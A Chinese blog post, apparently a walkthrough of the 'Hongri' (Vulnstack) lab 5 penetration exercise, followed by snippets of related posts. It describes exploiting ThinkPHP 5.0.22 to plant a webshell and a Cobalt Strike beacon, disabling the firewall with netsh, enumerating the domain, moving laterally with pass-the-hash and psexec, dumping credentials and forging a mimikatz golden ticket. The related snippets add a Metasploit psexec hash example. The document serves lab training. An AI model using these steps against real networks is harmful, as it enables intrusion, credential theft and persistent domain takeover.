红日靶场五

已于 2023-03-28 21:37:25 修改
阅读量270 收藏
点赞数
分类专栏: 内网 web 文章标签: web安全
于 2023-03-28 19:50:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52469895/article/details/129823443
版权

靶场

漏洞详情

主机密码

win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

win2008

win7

外网打点

nmap端口扫描

nmap -sC -sV -T4 -p- 3306 192.168.135.150

访问

http://192.168.135.150

thinkphp框架

5.0.22

直接用工具上传webshell

使用蚁剑连接之后我上传了冰蝎

admin权限

使用cs生成木马上传

然后上线

成功上线

常见的内网ip段有

10.0.0.0/8

10.0.0.0-10.255.255.255

172.16.0.0/12

172.16.0.0-172.31.255.255

192.168.0.0/16

192.168.0.0-192.168.255.255

内网

提了个权

信息收集

关闭防火墙

shell netsh firewall set opmode disable

查看本机ip,所在域:shell ipconfig /all

有域 sum

查看其他域内主机信息:shell net view

判断是否存在多个域:shell net view /domain

看到只有一个域

查看域内用户:shell net user /domain

查看域控制器:shell net group "domain controllers" /domain

查看域管理员的名字:shell net group "domain admins" /domain

总结现在的到的信息 有一个域sum,域内两台主机一台win7,一台dc,DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
其中域控制器DC.sun.com,域管理员为Administrator。

横向移动上线dc

尝试域内使用pth渗透,目标不出网。然后使用psexec64上线

先新建一个smb监听器

先住用户hash或明文密码

成功上线

维权

黄金票据

看到需要用户名,域和域sid,krbtgt的哈希

有上面信息收集可知域用户和域为用户可以填任意一个,域为sum.com

krbtgt hash

可以用 logonpasswords

来找一个合法的sid

也可以用 shell whoami /user 获取sid

这里使用

最后为

查看当前系统的票据 mimikatz kerberos::list

使用黄金票据上线

成功

渗透测试-红日靶场
konglong12311的博客
05-27 1785
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-30 1806
ATT&CK红队评估(红日靶场)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
ATT&CK 红日5靶机渗透攻略
weixin_47311099的博客
01-27 2152
环境搭建 下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 本次只有两台靶机 ,Win7双网卡模拟内外网 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com 改为 !qazwin7 ​ nat:192.168.8.129 (改为dhcp获取) 仅主机:192.168.138.136 到c盘phpstudy中启动phpstudy ​ ​ 2008 sun\admin 2020.com
黄金票据制作原理及利用方式
Happy峰
09-23 3074
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
小白渗透之旅——红日靶场5
qq_52849046的博客
05-28 1882
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战,容易被gangan
红日靶场渗透记录
m0_63028223的博客
12-26 553
一次简单的think PHP+内网环境渗透
ATT&CK实战:红日靶场
学生
06-19 638
已完成 0/9 [-] mysql 192.168.138.130:3306 root 123456 Error 1130: Host 'win7.sun.com' is not allowed to connect to this MySQL server。存在域 sun.com 域控 192.168.138.120 Windows Server 2008 HPC Edition 7600。上传frp 搭建socks隧道。开启win7远程桌面 并连接。获取域内所有用户的hash。连接win7远程桌面。
红日靶场5
m0_58595840的博客
01-10 577
红日5内网渗透
红日靶场()
qq_58091216的博客
05-05 3412
3) 然后,我们修改域控主机的DSRM账户登录方式。我们可以在注册表的HKLM:\System\CurrentControlSet\Control\Lsa\中新建DsrmAdminLogonBehavior项进行设置,将该新建的项中的值设为0、1、2可以分别设置不同的DSRM账户登录方式。通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
红日靶场渗透测试——红日靶场1(详细笔记)
热门推荐
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
渗透测试-红日靶场
konglong12311的博客
05-23 2013
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
渗透测试-红日靶场
konglong12311的博客
05-29 1452
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
【网络安全】——Modbus协议详解:工业通信的“通用语言”
最新发布
lingxw的博客
05-28 596
本文系统介绍了Modbus工业通信协议的技术要点。从发展历史(1979年由Modicon公司推出)到核心特性(主从模式、四类存储区),详细解析了协议族分类(RTU/ASCII/TCP/Secure)及版本演进。重点剖析了RTU/TCP报文结构,并通过典型示例说明通信机制(功能码、时序流程)。文章还提供了开发工具推荐(ModbusPoll、libmodbus等)和学习路径。作为工业通信领域的事实标准,Modbus凭借其简单可靠的特性在工业4.0时代仍保持活力,并持续演进新形态(如Modbus over TSN
Web安全测试-文件上传绕过-DVWA
lza20001103的博客
05-27 289
Web安全测试-文件上传绕过-DVWA
文件上传绕过方法总结
lza20001103的博客
05-27 180
文件上传绕过方法总结
网络安全之XSS漏洞
anquan2233的博客
05-28 580
然而,XSS 漏洞可以突破这一保护,攻击者可以通过注入恶意脚本来窃取用户的 Cookie,劫持用户的 Web 行为,甚至结合 CSRF(跨站请求伪造)进行针对性的攻击,进一步导致用户信息泄露或账户劫持等严重安全问题。与反射型和存储型 XSS 漏洞不同,基于 DOM 的 XSS 漏洞不需要用户数据出现在服务器的响应中,而是发生在客户端的 JavaScript 代码中。,简称 XSS),当应用程序将用户提交的数据发送到浏览器的页面中,但未经过适当的验证或转义时,就会引发跨站脚本(XSS)漏洞。
如何保护网络免受零日漏洞攻击?
endpointcentral的博客
05-27 882
它自动化了完整的终端管理生命周期,从简单的系统配置到复杂的软件部署。IT安全是另一个主要问题,许多易受攻击和未打补丁的设备面临恶意软件和漏洞利用的风险,但没有明确的方法来了解问题的总体规模或如何应对新的威胁。借助Endpoint Central,找到了一个单一、经济高效的解决方案,可以集成服务台所需的所有功能,包括远程支持、补丁管理、资产管理和软件部署。借助Endpoint Central的统一终端管理方法,能够相对轻松地执行所有移动配置、部署和安全管理任务,为客户提供更快、响应更快的服务。
2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
05-28 665
题目没有任何提示,附件gzl.pcap解题哥斯拉流量300多KB包很多,没啥经验只能挨个看回来之后又狠狠得撸了一把哥斯拉流量分析我这里用的是哥斯拉4.0.1测试链接这里发了两个包,我们进行分析。
三、web安全-信息收集
bronze_s的博客
05-27 822
信息搜集是指通过系统化的方法收集、整理和分析数据或信息的过程,广泛应用于学术研究、商业决策、网络安全等领域。核心目标是获取准确、相关且及时的信息以支持后续行动。
红日靶场msf
03-28
### 关于红日靶场中 MSF 的使用方法 #### 配置环境 在使用 Metasploit Framework (MSF) 进行渗透测试之前,通常需要确保 Kali Linux 中的相关工具已正确配置。例如,在某些网络环境中可能需要用到 `proxychains` 来通过代理访问目标系统[^2]。 以下是 `/etc/proxychains4.conf` 文件的一个典型配置示例: ```bash strict_chain proxy_dns remote_dns_subnet 224 tcp_read_time_out 15000 tcp_connect_time_out 8000 localnet 127.0.0.0/255.0.0.0 [ProxyList] socks5 127.0.0.1 9050 ``` 此配置允许用户通过本地运行的 SOCKS5 代理(如 Tor 默认端口 9050)转发流量,从而隐藏真实 IP 地址并绕过防火墙限制。 #### 利用 psexec 模块执行哈希传递攻击 对于 Windows Server 2008 的哈希传递攻击,可以利用 MSF 提供的 `exploit/windows/smb/psexec` 模块完成操作。具体流程如下: - **设置目标地址**: 将 RHOST 参数指定为目标主机的 IP 地址。 - **提供 NTLM 哈希值**: 如果已经获取到用户的 NTLM 密码散列,则可以通过 SMB 协议验证身份而无需明文密码。 - **加载辅助模块**: 可能还需要额外加载一些支持脚本来增强功能或者解决兼容性问题[^1]。 下面是一个简单的命令序列用于启动该漏洞利用过程: ```ruby use exploit/windows/smb/psexec set RHOST <target_ip> set SMBUser administrator set SMBPass <ntlm_hash> # 此处输入NTLM hash而非实际密码 run ``` 这段 Ruby 脚本会尝试连接至远程服务器上的服务管理器进程,并借助合法账户凭证创建一个新的交互式 shell session。 #### 注意事项 尽管上述技术非常强大且广泛应用于授权的安全评估活动中,请始终遵循当地法律法规以及客户许可协议条款来开展任何类型的网络安全研究工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值